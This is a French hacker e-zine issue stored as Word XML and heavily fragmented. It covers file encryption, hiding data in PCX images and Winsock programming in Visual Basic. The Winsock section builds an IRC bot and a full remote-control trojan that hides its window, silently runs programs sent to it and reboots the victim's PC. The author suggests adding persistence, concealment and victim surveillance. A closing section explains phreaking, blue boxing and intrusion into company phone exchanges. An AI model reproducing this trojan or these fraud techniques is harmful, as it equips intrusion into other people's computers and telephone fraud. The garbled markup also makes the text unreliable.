les OS que je connai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le faire fonctionner, suivez les instructions. Sinon pour le tester sous DOS, mettez le texte suivant da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un fichier .BAT(ex: go.bat) lancez le fichier .BA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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>@ECHO OF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Salut, il s'agit d'un test de cryptage.&gt;texte.de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Programme de cryptage créé par KOP&gt;&gt;texte.de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pour le groupe HackerStorm et le e-mag 1 d'HackerStorm&gt;&gt;texte.de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Voici le texte qui compose le fichier clé.&gt;cle.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Dans la version compilée, seul les 16 premiers octets du fichier clé sont utilisé.&gt;&gt;cle.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Cryptage du fichier texte.deb en texte.cry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Crypt texte.deb + cle.dat texte.cry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Décryptage de texte.cry en texte.fin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Crypt texte.cry - cle.dat texte.f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Veuillez ouvrir les fichiers texte.deb et texte.fi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Si ces 2 fichiers sont identiques c'est que le cryptage a réussi avec succè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Si vous souhaitez donner le fichier crypté à quelqu'un, veuillez lui donn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>ECHO le fichier texte.cry que seul lui pourra décrypté s'il a le fichier cle.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4 - Cacher des données dans une image PC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cacher des données dans une image PCX, il faut savoir comment est lue et est faite une image PCX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 schéma est plus compréhensif que des explication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Composition d'une image PC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Nombre    -  Type de donnée contenue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d'octets    - dans cette partie du fichier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                -          Entête de la PCX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128             -      (nombre de couleurs,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                -       taille(X-Y),version,....)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X*Y        -       DATA de la PCX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moins la    - couleurs de l'images classé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compression-      de en haut à gauche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               -          à en bas à droite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nbre colors -    Couleurs de la palette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fois 3(RGB) -   3 octets pour une couleur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Les programmes qui lisent une image PCX, font comme suit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ouvre le fichier PC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lit les 128 premières oct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les interprète et ressort la taille, le nombre de couleurs, la version,... de la PC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va à la fin et revient de (nbre couleurs*3(en RGB)) oct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lit la palette de couleurs jusqu'a la fin du fichi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va au 128ème oct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lit l'équivalent(car compression) de (X*Y) oct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ferme le fichier PC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en y réfléchissant, nous ne pouvons écrire qu'en un seul endro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'est entre les DATAde la PCX et la palette car le programme n'y ira jamai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e fois vos données cachées dans la PCX, votre PCX s'affichera normal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sa composition sera de la form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Composition de l'image PCX avec des données cach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Nombre    -  Type de donnée contenue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d'octets     - dans cette partie du fichier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                -          Entête de la PCX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128             -      (nombre de couleurs,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                -       taille(X-Y),version,....)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X*Y        -       DATA de la PCX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moins la    - couleurs de l'images classé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compression-      de en haut à gauche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                 -          à en bas à droite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     infini        -             DATA cachés    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nbre colors  -    Couleurs de la palette      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 fois 3(RGB)  -   3 octets pour une couleur  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vous savez maintenant cacher des Datas dans un fichier PCX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 vous maintenant de faire votre propre logiciel grâce à ces donn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de trouver si cela est possible de faire pareil pour les autres imag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and vous en aurez trouvé, envoyez moi un e-mail pour que vous puissiez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pparaitre dans la rubrique "Nouvelles infos trouvées par les lecteurs du mag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u prochain HackerStorm'mag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ab/>
        <w:t>By Ko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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w: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color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">          PROGRAMMATION WINSOCK par Nos-K                                                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>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1 -Qu'est-ce que Winsock ?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contrôle Winsock fourni par Visual Basic 5 (et bien sur VB6 =) permet de gérer relativement simpleme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 flot de données à l'aide des protocoles TCP ou UDP. Ce contrôle est destiné a développer d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pplications Client / Serveur. Le protocole mis en œuvre par ce contrôle est soit UDP soit TCP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s différences entre ces 2 protocoles ont été expliqué par KOP dans la partie Hacking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cet article, nous n'utiliserons que du TCP pour un soucis de sécurité de transfer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2 - Les commandes de  Winso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vant de voir les commandes winsock, attardons nous sur la manière dont la connection s'opèr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>Etablissement d'une connexion Client/Serveu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Le serveur est à l'écou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Le client demande l'ouverture de la connex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Le serveur accepte (ou non) la connex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i la connexion est acceptée, elle est alors ouver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Les deux applications peuvent alors communiqu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c'est facile, non ? Bon maintenant passons aux commandes de ce contrôle ainsi que leur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plications(dans cet explication, le controle winsock aura le nom 'ws')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>Voici les commandes relatives au client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connect "hote", port   -&gt; Cette commande fera connecter votre application client au serv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Vous pouvez tapez juste "ws.connect" si RemoteHost et RemotePor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 ont été défini préalable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RemoteHost = "host" -&gt; Le RemoteHost est l'hote sur lequel vous désirez vous connectez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RemotePort = port       -&gt; Indique sur quel port de l'hote vous allez vous connectez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 1: ws.connect "www.microsoft.com",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x 2: ws.RemoteHost = "www.microsoft.com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ws.RemotePort = 8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ws.connec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s 2 exemples sont équivalent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>Voici les commandes relatives au serveu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ws.Listen -&gt; Met le serveur en mode 'ecoute' ce qui signifie qu'il est attentif aux demandes de connection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Vous devez dabord définir ws.LocalPort pour que le listen se fasse sur ce por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Accept RequestID -&gt; Quand le client tente de ce connecté, il envoie une requete de connex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Si le serveur est en mode 'ecoute' il interceptera cette requete et devra décider si il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l'accepte ou la refuse. RequestID represente le numéro de la requête. Ce numéro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est différent pour  chaque connexion activ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>Et maintenant, les commandes relatives a la fois au client et au serveu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close -&gt; Cette commande fermera la connex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Getdata variable -&gt; Avec cette commande, le controle winsock enregistrera c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qu'il recoit dans la 'variable' (qui doit etre de type 'String' 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Senddata Variable -&gt; C'est exactement l'opposé de GetData =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Cette commande envera ce que vous lui indiquez entre parenthè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(qui doit etre de type 'String' ) au serveur (ou au client, cela depend =)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s.State.Cette commande indique l'état du controle. Voici un tableau récapitulatif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|</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> Constante </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |        Valeur </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Description</w:t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|____________________________________________________________________ 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|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Closed </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |              0 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Fermé (valeur par défaut) </w:t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Open </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |              1 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Ouvert </w:t>
        <w:tab/>
        <w:tab/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Listening  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |              2 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">À l'écoute </w:t>
        <w:tab/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ConnectionPending </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |              3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|         </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Connexion en attente </w:t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ResolvingHost </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |              4 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Hôte en cours de résolution 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HostResolved </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     |              5 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Hôte résolu </w:t>
        <w:tab/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Connecting </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |              6 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">En cours de connexion </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">|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Connected </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |              7 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Connecté </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>|</w:t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Closing </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |              8 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t>Connexion en cours de fermeture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|</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |             </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">par l'autre PC </w:t>
        <w:tab/>
        <w:tab/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| sckError </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     |              9 </w:t>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Erreur </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>|</w:t>
        <w:tab/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|____________________________________________________________________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ab/>
        <w:tab/>
        <w:t>Et voici maintenant les évènements du controle Winsock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nectionRequest -&gt; cet événement est déclenché sur le serveur lors d'une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demande de connexion émise par le client. C'est dans le code associé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à cet événement que l'on traitera l'acceptation ou le refus de la connexion. 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ataArrival -&gt; l'arrivée de données déclenche cet événement. Il faudra donc associer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    à celui-ci la méthode GetData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Error -&gt; Evénement déclenché par une erreur dans la connexion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nnect -&gt; Cet évènement ce déclenche une fois la connection accepté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par le serveur (je met souvent "msgbox("cool ca marche")" ;-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endComplete -&gt; Bah c'est quand il a fini d'envoyer les datas que vous lui avez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  demandé d'envoyer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endProgress -&gt; Cet évènement se déclenche quand winsock est en tra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     d'envoyer des donné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3 - Application théori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 une application théorique (puisqu'elle ne fait rien =)) mettant en avant les chos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ab/>
        <w:t>les plus importantes a savoi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>Application SERVEUR :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Contrôle appelé ws_serveur</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ws_serveur.protocol = 0 (le 0 represente le protocole TCP et le 1 UD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ws_serveur.localport = 1234</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                            </w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Application CLIENT :</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Contrôle appelé ws_client</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ws_client.remotehost = 10.10.1.2 (adresse IP du serveu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ws_client.remoteport = 1234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ws_client.protocol = 0 </w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Etablissement de la connexion</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Le serveur doit être en mode écoute :</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ws_serveur.listen</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Le client demande l'établissement d'une connexion :</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ws_client.connect</w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Un événement ConnectionRequest est déclenché sur le serveur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on s'en occupe avec le code suivant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ab/>
        <w:t>Private Sub WS_serveur_ConnectionRequest (requestID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/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>' Acceptation de la connex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ws_serveur.Accept requestI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FF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oilà, la communication est établie</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Pour envoyer des données </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Client à Serveur : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>ma_data = "Bonjour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ws_client.SendData (ma_data)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Serveur à Client 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ma_data = "Au revoir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ab/>
        <w:tab/>
        <w:t>ws_serveur.SendData (ma_data)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Pour récupérer les données :</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Le client envoi des données au serveur. L'evenement DataArrival se déclenche.....</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>Private Sub ws_serveur_DataArrival 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/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>' Appel de la méthode GetDat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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>' Une chaîne de caractères va être placée dans la variable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ws_serveur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Voilà, vous savez a présent comment faire une application Client/serv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Mais bon, c'est peut-être encore pas très clair dans votre tet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Je vais donc vous donnez le code d'un trojan et d'un bot tous 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deux simplifié a leur plus simple expression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ab/>
        <w:t>4 - Un bot simple en Visual Basi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  <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Déjà, le formulair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 xml:space="preserve">Vous mettez un controle winsock (vous tapez 'Crtl-T' et vous choisissez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"Microsoft Winsock Control", (il se trouve dans le répertoire \Windows\System\mswnsck.ocx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Créez un objet winsock et nommez le 'ws'. Ensuite vous ajoutez trois 'text box', 2 label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avec comme caption "Hote" et "Port". Donnez le nom "Text" au premier textbox, "Host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au deuxième et "HostIP" au dernier. Ajoutez ensuite deux boutons avec comme cap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"Quitter" et "Connect". Vous leur donnez comme nom "connect" et "quitter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Voilà, votre formulaire est pret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  <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Passons au cod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Quitter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si vous cliquez sur quitter...bah vous quittez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Connect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Vous vous connectez au serveur IRCn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onnect "irc.twiny.org", 666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host.Text = ws.RemoteHo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hostip.Text = ws.RemoteHostI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 xml:space="preserve">'Ce texte est juste esthétique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.Text = "Veuillez patientez, la connection s'etablie...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Connect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Execution lors de la connec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"User Nosk " + Chr(34) + "127.0.0.1" + Chr(34) + " " + Chr(34) +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s.RemoteHost + Chr(34) + " :HackerStorm" + vbCrL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Avec ces commandes, vous informez le Serveurs de votre, nick, de ou vous allez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des trucs dans le genre (Allez consulter l'article de KoP sur l'irc pour plus d'info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"NICK Nosk" + vbCrL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"JOIN #hackerstorm" + vbCrL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"PRIVMSG #hackerstorm :Lo all" + vbCrL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host.Text = ws.RemoteHo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hostip.Text = ws.RemoteHostIP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Cette partie est la plus compliqué puisque elle analyse les données et en renvoi d'autres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.Text =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For i = 1 To Len(da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Mid$(dat, i, 1) = " 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If Mid$(dat, i + 1, 7) = "PRIVMSG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    For j = i + 9 To Len(da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        If Mid$(dat, j, 2) = ":!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ab/>
        <w:t>ws.SendData Mid$(dat, j + 2, Len(dat) - j - 2) + vbCrL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ab/>
        <w:t>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    Next j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ext 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PING ? PONG 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Left(dat, 6) = "PING :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ws.SendData "PONG :" + Mid$(dat, 7, Len(dat) - 7) + vbCrL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Text.Text = Left(dat, 5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Error(ByVal Number As Integer, Description As Stri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Scode As Long, ByVal Source As String, ByVal HelpFile As Stri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HelpContext As Long, CancelDisplay As Boolea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  <w:t>'Si jamais il y a une erreur, on se reconnecte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onnect "irc.twiny.org", 666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.Text = "Veillez patientez, la connection se réetablie...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ab/>
        <w:tab/>
        <w:t>Utilisation de ce bo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Ce bot est vraiment simple et possède de nombreux défaults mai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vous saurez bien l'améliorer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Pour vous opez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!MODE #Channel +o Ni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En fait, ce sont toutes les commandes "brut" de l'IRC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(pour les connaitre, lisez l'article de KoP, je ne le dirai jamais assez =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Pour fermer le bot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!QU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5 - Un trojan en Visual Basic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Nous allons maintenant crée un Trojan simple (vraiment très simple =)) qui ne possède pas tout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les fonctions escomptées d'un Trojan. Ce n'est pas grave, après c'est de la programmation pu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qu'il faut utiliser ce qui n'entre pas dans le cadre de la programmation Winsock.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>Ce trojan fonctionne, comme toutes les applications Client/Serveur, en deux partie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  <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Le client 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Nous allons créer un formulaire contenant 8 bouton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Voici les captions et les nom correspondant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        Caption          |      Nom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Connect</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  |  cmd_connect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 xml:space="preserve">| Question </w:t>
        <w:tab/>
        <w:t xml:space="preserve">  |  question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Redémarrer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  |   reboot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Fermer le Lecteur |   cd_ferme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Ouvrir le Lecteur  |   cd_open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 xml:space="preserve">| Executer  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">  |   lancer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Message</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  |   message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| Quitter</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  |   quitter</w:t>
        <w:tab/>
        <w:t>|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ous devez aussi mettre, bien sûr, un controle "Winsock" avec comme nom "ws"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rois "edit box" -&gt; "arrive","port" et "ip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u w:val="single"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Le Code du Clien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cmd_connect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ip2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port2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p2 = ip.T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port2 = 10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RemoteHost = (ip2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RemotePort = 10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port.Text = ws.RemoteHo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onnec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quitter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Unload Form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cd_ferme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"cdf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messsage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msg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g = "msg" + Chr(34) + Path.Text + Chr(34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ms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cd_open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"cdo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lancer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run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run = "run" + Chr(34) + arrive.Text + Chr(34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send.Text = ru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ru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Reboot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"reb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Message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msg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g = "msg" + Chr(34) + arrive.Text + Chr(34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ms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Question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msq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q = "msq" + Chr(34) + arrive.Text + Chr(34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msq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Connect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gBox ("Connexion réussie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arrive.Text =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Error(ByVal Number As Integer, Description As Stri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Scode As Long, ByVal Source As String, ByVal HelpFile As Stri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HelpContext As Long, CancelDisplay As Boolea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c'etait la partie la plus simple puisque le client sert juste a envoyé des info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'est le serveur qui a la tache ardue de les interpréter et de les exécuter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>Le Serveu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contient deux chose, un module.bas et un formulaire tout simpl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ab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Le module Bas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rivate Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As Stri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lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback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eclare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y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eclare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As Stri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ublic Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd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ublic Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow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ublic Const SW_HIDE = 0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ublic Const GW_OWNER = 4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rivate Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction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uParam As Long, lpvParam As Any, ByVal fuWinIni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rivate Const SPI_SCREENSAVERRUNNING = 9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eclare Function exitwindows Lib "User" Alias "ExitWindows" (ByVal dwReturnCode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wReserved As Integer)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Private Declare Function ShowCursor Lib "user32" (ByVal bShow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Pour Fermer le lect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ub FermerCD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ret = mciSendString("Set cdaudio door closed wait", vbNullChar, 0, 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Pour ouvrir le lect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ub OuvrirCD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ret = mciSendString("Set cdaudio door Open wait", vbNullChar, 0, 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ub RedemarrerWindows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 = exitwindows(66, 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Type SECURITY_ATTRIBUT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Length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lpSecurityDescriptor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bInheritHandle As Boolea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Typ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eclare Function RegSetValueEx Lib "advapi32" Alias "RegSetValueExA" (ByVal hKey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lpValueName As String, ByVal Reserved As Long, ByVal dwType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szData As String, ByVal cbData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eclare Function RegCloseKey Lib "advapi32" (ByVal hKey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Declare Function RegCreateKeyEx Lib "advapi32" Alias "RegCreateKeyExA" (ByVal hKey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lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As Stri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ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As SECURITY_ATTRIBUTE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phkResult As Long, lpdwDisposition As Long)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Donc, voilà vous avez le module bas, il contient des déclarations d'API et autre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tout ce qui est nécessaire pour exécuter les fonction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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Le Formulair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Pas besoin de grand chose, juste le controle Winsock et avec le nom "ws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Form_Load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LocalPort = 10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SysTray32.Visible = Fa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hWndDeMonForm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ret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hWndDeMonForm = GetWindow(Me.hwnd, GW_OWNE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ret = ShowWindow(hWndDeMonForm, SW_HID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Retour As Lo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Close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LocalPort = 10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ConnectionRequest(ByVal requestID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Accept requestI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SendData ("Connexion Etablie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Dim dat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GetData da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Left(dat, 3) = "msg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longu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longu = Len(da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longu = longu - 6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msg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msg = Mid$(dat, 5, longu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MsgBox (ms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Left(dat, 3) = "run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longue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longue = Len(da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longue = longue - 6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run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run = Mid$(dat, 5, longu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Shell run,vbhide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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' vbhide sert à executer un programme sans que l'utilisateur le voi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ws.SendData ("L'application " + run + " a bien été exécuté =)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Mid$(dat, 1, 3) = "cdo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Call OuvrirC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ws.SendData ("Lecteur CD Ouvert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Mid$(dat, 1, 3) = "cdf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Call FermerC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ws.SendData ("Lecteur Cd Fermé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Left(dat, 3) = "msq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longuer As Integ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reponse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longu = Len(da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longu = longuer - 6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Dim msq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msq = Mid$(dat, 5, longue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reponse = InputBox(msq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   ws.SendData (repons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If dat = "reb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 Call RedemarrerWindow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   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s_Error(ByVal Number As Integer, Description As String, ByVal Scode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ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long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CancelDisplay As Boolean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On Error Resume Nex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LocalPort = 10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s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Voilà, ce trojan a quelques fonctions 'amusantes' mais rien de bien intéressant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c'est juste un exemple =). Après vous pouvez ajoutez ce que vous voulez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En particulier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- Une fonction lui permettant de ce lancer au démarrage de windows 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 xml:space="preserve">  de rester invisible à l'utilisateu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- Une auto-copi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ab/>
        <w:tab/>
        <w:t>- Une auto-installation avec toute les DLL (avec VB6, vous pouvez le fair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Des informations sur la connection de votre victi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Accès dis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 xml:space="preserve">6 - Conclusion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j'espère avoir été clair sur ce controle passionant puisque simple d'utilisa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des résultats vraiment extraordinnaire vu le boulot investi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tab/>
        <w:tab/>
        <w:t>C'était mon premier article dans ce mag donc j'attends vos commentaires =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KOP: logique, c'est le premier HackerStorm'mag  =o) )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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w: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  <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">PHREAKING par Elgadir                                                                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>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1 - Explications sur le phreak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>Phreaking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Piratage du téléphone. Du point de vue des compagnies téléphoniques, il s'agit d'u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scroquerie caractérisée. Du point de vue des hackers et des phreakers, d'un simp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jeu intellectuel bon enfant. </w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>PABX/VMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Des réseaux téléphoniques internes utilisés par certaines entreprises dans lesquel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une intrusion est facilement possible. Le PABX, c'est en general une centrale d'aiguillag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formatisée qui permet à une énorme quantité de lignes telephoniques d'etre geré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formatiquement. On peut s'y adresser de plusieurs façons : par l'interi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(PC, VAX, Terminal) ou par l'exterieur (telephone classique, modem). Une VMB est u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boîte vocale : c'est une sorte de répondeur qui vous permet de recevoir des messag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d'en envoyer à d'autres correspondants. Mais pour cela, il faut que les correspondan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soient sur le même serveur (la plupart des grosses entreprises en possèdent une). </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>Une PABX a souvent la possibilité de se commuter sur le réseau externe de l'entrepris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C'est ce qu'on appelle un outdial (parfois détournable). </w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Le Boxing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>C'est l'art de bricoler un boitier electronique dans le but de duper un central téléphoni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ou n'importe quel appareil à reconnaissance vocale. Existe avec presque toutes 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uleurs de l'arc en ciel (Blue box, Black box, Beige Box etc etc..).</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Blue boxing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
        <w:t>C'est le premier système de boxing. Inventé dans les années 60 par des etudiants au MI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is developpé par le très connu Capitain Crunch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ECHNIQUE : On appelle un numéro vert (gratuit). On émet un son qui fait croire au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centraux qu'on a quitté la ligne, ou plutôt que la ligne est libr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   A partir de ce moment la, on peut appeler n'importe où gratuite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Bien sur, le système téléphonique américain est différent du système français, donc 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ogrammes qui émettent les sons pour l'amérique sont inefficaces. Par contre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a bluebox française a été trouvée en 1992. Elle se présentait sous la forme d'u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ogramme pour Atari ST. FT a réagit, et depuis 1992, la BB française ne fonctionne plu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ais le Blueboxing est toujours possible. Plutot que de s'attaquer au système français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on s'attaque aux systèmes étrangers. Pour cela, on appelle un numéro vert international (05 9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i vas vers un pays donné, puis on joue le son de BlueBox fonctionnant dans ce pay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A l'heure actuelle, les BlueBox étrangères sont très dures à trouver. </w:t>
        <w:br/>
        <w:tab/>
        <w:tab/>
